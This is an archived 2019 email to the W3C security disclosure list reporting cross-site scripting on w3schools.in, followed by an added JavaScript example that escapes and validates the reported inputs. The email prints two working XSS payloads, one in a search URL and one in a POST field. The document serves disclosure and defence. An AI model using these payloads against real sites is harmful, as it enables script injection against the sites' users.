- From: Acelakshit verma <acelakshitverma@gmail.com>
- Date: Wed, 8 May 2019 12:42:56 +0530
- To: public-security-disclosure@w3.org
- Message-ID: <CAB-AvfJS84E1KkW2KW7ymxXWZVAbUSFJvbZ1yZw9P0aB8n8bwg@mail.gmail.com>
An independent web security researcher from India has found some vulnerabilities in your website.

domain
======
https://www.w3schools.in/

vulnerability type
==================
XSS cross site scripting

Vulnerability Description
=========================
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.

POC
===
https://www.w3schools.in/search/?q= '"><video/source/onloadstart=(alert)(/Acehaxor/)><source>"

HTTP POST DATA
==============
url=http%3A%2F%2Fwww.dba-oracle.com %2Foracle_news%2Frssfeed.php&showtitle=1&showimg=0&showinput=0&maxitems=5&showdescs=0&titletrim=0&titlemax=0&desctrim=0&descmax=0&tabwidth=122px%22%27--!%3E%3CScript/K/%3E(confirm)(1)%3C/Script/K/%3E&linktarget=_blank&cssurl=&dotransition=1&bordercol=%2300359E&headbgcol=%23999999&headtxtcol=%23ffffff&titlebgcol=%23dddddd&titletxtcol=%230000ff&itembgcol=%23ffffff&itemtxtcol=%23000000&mode=javascript&ctl=0#

THE SCREENSHOTS AND THE VIDEO POC ARE ATTACHED BELOW

HOPE YOU'LL FIX IT ASAP ;)

IF I AM ELIGIBLE FOR ANY TYPE OF REWARDS, THANKS, SWAGS, RECOMMENDATION. KINDLY DO THE NEEDFUL

BEST REGARDS
-Acelakshit verma

--
We Are Plymouth's
about.me/weareplymouths
<https://about.me/weareplymouths?promo=email_sig&utm_source=product&utm_medium=email_sig&utm_campaign=gmail_api&utm_content=thumb>
Attachments
- video/mp4 attachment: Screencast_05-08-2019_12:39:40_PM.mp4
- image/png attachment: Screenshot_from_2019-05-08_12-39-45.png
Received on Monday, 13 May 2019 06:59:29 UTC
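
The two reported inputs run through output encoding and allowlist validation, as an added example that is not part of the original message or the site's own code. The rendering functions and markup are hypothetical (the report does not show how the pages build their HTML), and the POST body is trimmed to the fields needed here.

```javascript
// Added example: function names and markup are assumptions, not the site's code.

// Escape the characters that can end an HTML text node or a quoted attribute value.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Allowlist for a CSS length such as "122px"; anything else falls back to a default.
function safeCssLength(value, fallback = '100px') {
  return /^\d{1,4}(px|em|%)$/.test(String(value)) ? String(value) : fallback;
}

// Hypothetical search page fragment that reflects q inside a quoted attribute.
function renderSearchBox(q) {
  return `<input type="search" name="q" value="${escapeHtml(q)}">`;
}

// Hypothetical widget wrapper that reflects tabwidth inside a style attribute.
function renderWidget(params) {
  const width = safeCssLength(params.get('tabwidth'));
  return `<div class="feed" style="width:${escapeHtml(width)}"></div>`;
}

// Inputs taken from the report: the q value and the tabwidth field of the POST body
// (body trimmed to three fields for this example).
const reportedQuery = `'"><video/source/onloadstart=(alert)(/Acehaxor/)><source>"`;
const reportedBody = new URLSearchParams(
  'showtitle=1&tabwidth=122px%22%27--!%3E%3CScript/K/%3E(confirm)(1)%3C/Script/K/%3E&linktarget=_blank'
);

// The quote and angle brackets are encoded, so the value never leaves the attribute.
console.log(renderSearchBox(reportedQuery));
// The tabwidth value is not a plain CSS length, so the default is used instead.
console.log(renderWidget(reportedBody));
```

Escaping alone keeps the `q` value inside its attribute; the `tabwidth` field additionally gets validated because a style value has its own syntax that HTML escaping does not constrain.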